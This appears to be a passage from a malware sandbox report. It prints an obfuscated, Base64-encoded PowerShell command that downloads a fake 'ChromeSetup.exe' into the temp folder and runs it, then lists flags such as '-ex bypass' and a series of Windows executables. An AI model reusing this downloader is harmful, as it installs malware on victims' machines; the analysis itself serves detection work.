AkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g "
option -ex bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -ex bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -ex bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
file C:\Windows\System32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe